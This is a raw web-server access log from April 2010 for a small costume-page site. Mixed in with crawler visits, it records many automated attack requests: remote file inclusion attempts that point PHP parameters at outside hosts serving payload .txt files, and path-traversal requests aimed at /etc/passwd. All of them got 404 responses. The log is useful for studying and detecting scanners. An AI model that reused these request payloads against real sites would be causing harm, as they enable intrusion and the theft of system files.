87.250.255.243 - - [21/Apr/2010:01:11:44 -0500] "GET /logs/access_log.1160697600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:13:38 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.221.63.33 - - [21/Apr/2010:01:14:33 -0500] "GET /logs/access_log.1220054400//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://snoothie.com/includes/MM_XSLTransform/byz9991.txt??? HTTP/1.0" 404 341 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:16:11 -0500] "GET /logs/access_log.1191024000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:19:21 -0500] "GET /logs/access_log.1157414400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.234 - - [21/Apr/2010:01:20:57 -0500] "GET /logs/access_log.1157673600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [21/Apr/2010:01:21:08 -0500] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:08 -0500] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:08 -0500] "GET /logs/access_log.1252368000//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:36 -0500] "GET /logs/access_log.1252368000//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:36 -0500] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:36 -0500] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:43 -0500] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:43 -0500] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:43 -0500] "GET /logs/access_log.1252368000//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:44 -0500] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:44 -0500] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:21:44 -0500] "GET /logs/access_log.1252368000//addpost_newpoll.php?addpoll=preview&thispath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:22:34 -0500] "GET /logs/access_log.1163721600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [21/Apr/2010:01:24:03 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.70.32.2 - - [21/Apr/2010:01:25:41 -0500] "GET //header.php?abspath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:25:41 -0500] "GET /logs//header.php?abspath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.70.32.2 - - [21/Apr/2010:01:25:41 -0500] "GET /logs/access_log.1263600000//header.php?abspath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:26:23 -0500] "GET /logs/access_log.1217980800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [21/Apr/2010:01:28:00 -0500] "GET /logs/access_log.1265760000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
163.24.136.10 - - [21/Apr/2010:01:28:16 -0500] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.cerep.co.kr/ver1//ajim1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:01:28:16 -0500] "GET //bbs//write_comment_update.php?board_skin_path=http://www.cerep.co.kr/ver1//ajim1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
163.24.136.10 - - [21/Apr/2010:01:28:16 -0500] "GET /logs/access_log.1270684800%20%20//bbs//write_comment_update.php?board_skin_path=http://www.cerep.co.kr/ver1//ajim1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:28:17 -0500] "GET /logs/access_log.1266364800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [21/Apr/2010:01:29:19 -0500] "GET /logs/access_log.1213056000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [21/Apr/2010:01:31:29 -0500] "GET /logs/access_log.1205452800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.221.130.13 - - [21/Apr/2010:01:32:13 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:32:17 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:32:17 -0500] "GET /logs/access_log.1268265600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:32:30 -0500] "GET /logs/access_log.1268265600//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:32:30 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:32:30 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.249.71.225 - - [21/Apr/2010:01:32:55 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:00 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:05 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:10 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:14 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:19 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:24 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [21/Apr/2010:01:33:27 -0500] "GET /logs/access_log.1171929600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.225 - - [21/Apr/2010:01:33:29 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Apr/2010:01:33:34 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [21/Apr/2010:01:35:59 -0500] "GET /logs/access_log.1203206400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.221.130.13 - - [21/Apr/2010:01:36:38 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:36:38 -0500] "GET /logs/access_log.1219708800%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:36:38 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:37:48 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:37:48 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.13 - - [21/Apr/2010:01:37:48 -0500] "GET /logs/access_log.1219708800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:38:32 -0500] "GET /logs/access_log.1237420800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:40:26 -0500] "GET /logs/access_log.1163376000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [21/Apr/2010:01:41:09 -0500] "GET /logs/access_log.1244160000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.67.66 - - [21/Apr/2010:01:41:12 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:41:12 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:41:12 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:41:46 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:41:46 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.67.66 - - [21/Apr/2010:01:41:46 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.46.199.54 - - [21/Apr/2010:01:41:57 -0500] "GET /logs/access_log.1224288000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:01:42:58 -0500] "GET /logs/access_log.1215388800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:44:52 -0500] "GET /logs/access_log.1173398400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [21/Apr/2010:01:46:13 -0500] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:01:46:13 -0500] "GET /logs/access_log.1268265600//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
87.106.132.3 - - [21/Apr/2010:01:46:13 -0500] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.236.43.200 - - [21/Apr/2010:01:47:12 -0500] "GET /logs/access_log.1219363200/index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.236.43.200 - - [21/Apr/2010:01:47:13 -0500] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.236.43.200 - - [21/Apr/2010:01:47:13 -0500] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [21/Apr/2010:01:47:25 -0500] "GET /logs/access_log.1200700800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.217.216.132 - - [21/Apr/2010:01:47:51 -0500] "GET /logs/access_log.1268265600//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
118.217.216.132 - - [21/Apr/2010:01:47:52 -0500] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
118.217.216.132 - - [21/Apr/2010:01:47:52 -0500] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.250.255.243 - - [21/Apr/2010:01:50:35 -0500] "GET /logs/access_log.1205625600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:51:51 -0500] "GET /logs/access_log.1161993600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:53:45 -0500] "GET /logs/access_log.1167868800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:56:17 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:01:58:11 -0500] "GET /logs/access_log.1169942400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.232 - - [21/Apr/2010:01:58:57 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Apr/2010:02:01:21 -0500] "GET /logs/access_log.1259280000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.254.54.122 - - [21/Apr/2010:02:01:54 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
85.19.150.100 - - [21/Apr/2010:02:02:10 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
212.92.23.152 - - [21/Apr/2010:02:02:23 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
212.241.251.224 - - [21/Apr/2010:02:03:19 -0500] "GET /logs/send_reminders.php?includedir=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 307 "-""Mozilla/5.0"
212.241.251.224 - - [21/Apr/2010:02:03:19 -0500] "GET /logs/access_log.1212969600%20%20/send_reminders.php?includedir=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.241.251.224 - - [21/Apr/2010:02:03:19 -0500] "GET /send_reminders.php?includedir=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.57.164.32 - - [21/Apr/2010:02:03:47 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
87.250.255.243 - - [21/Apr/2010:02:03:53 -0500] "GET /logs/access_log.1177804800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [21/Apr/2010:02:05:47 -0500] "GET /logs/access_log.1188259200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.217.216.132 - - [21/Apr/2010:02:06:20 -0500] "GET /logs/access_log.1221696000//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
85.19.150.100 - - [21/Apr/2010:02:06:59 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [21/Apr/2010:02:07:04 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
212.92.23.152 - - [21/Apr/2010:02:07:16 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.92.23.152 - - [21/Apr/2010:02:08:51 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
87.250.255.243 - - [21/Apr/2010:02:08:57 -0500] "GET /logs/access_log.1243209600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.57.164.32 - - [21/Apr/2010:02:08:57 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
65.254.54.122 - - [21/Apr/2010:02:09:10 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
85.19.150.100 - - [21/Apr/2010:02:09:17 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.57.164.32 - - [21/Apr/2010:02:09:19 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
85.19.150.100 - - [21/Apr/2010:02:10:26 -0500] "GET /logs/access_log.1271030400////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
85.19.150.100 - - [21/Apr/2010:02:10:26 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
85.19.150.100 - - [21/Apr/2010:02:10:27 -0500] "GET /logs////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
65.254.54.122 - - [21/Apr/2010:02:11:09 -0500] "GET /logs/access_log.1271030400////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
65.254.54.122 - - [21/Apr/2010:02:11:10 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
65.254.54.122 - - [21/Apr/2010:02:11:10 -0500] "GET /logs////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
87.250.255.243 - - [21/Apr/2010:02:12:08 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
65.254.54.122 - - [21/Apr/2010:02:13:06 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
65.254.54.122 - - [21/Apr/2010:02:13:06 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
65.254.54.122 - - [21/Apr/2010:02:13:06 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
212.92.23.152 - - [21/Apr/2010:02:13:13 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
212.92.23.152 - - [21/Apr/2010:02:13:14 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
212.92.23.152 - - [21/Apr/2010:02:13:14 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
212.92.23.152 - - [21/Apr/2010:02:13:50 -0500] "GET /logs/access_log.1271030400////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
212.92.23.152 - - [21/Apr/2010:02:13:51 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
212.92.23.152 - - [21/Apr/2010:02:13:51 -0500] "GET /logs////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
87.250.255.243 - - [21/Apr/2010:02:14:02 -0500] "GET /logs/access_log.1193616000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.19.150.100 - - [21/Apr/2010:02:14:04 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.19.150.100 - - [21/Apr/2010:02:14:04 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
85.19.150.100 - - [21/Apr/2010:02:14:04 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
85.19.150.100 - - [21/Apr/2010:02:14:47 -0500] "GET /logs/access_log.1271030400////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.57.164.32 - - [21/Apr/2010:02:14:47 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
85.19.150.100 - - [21/Apr/2010:02:14:47 -0500] "GET ////index.php?option=com_jcs&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.57.164.32 - - [21/Apr/2010:02:14:47 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
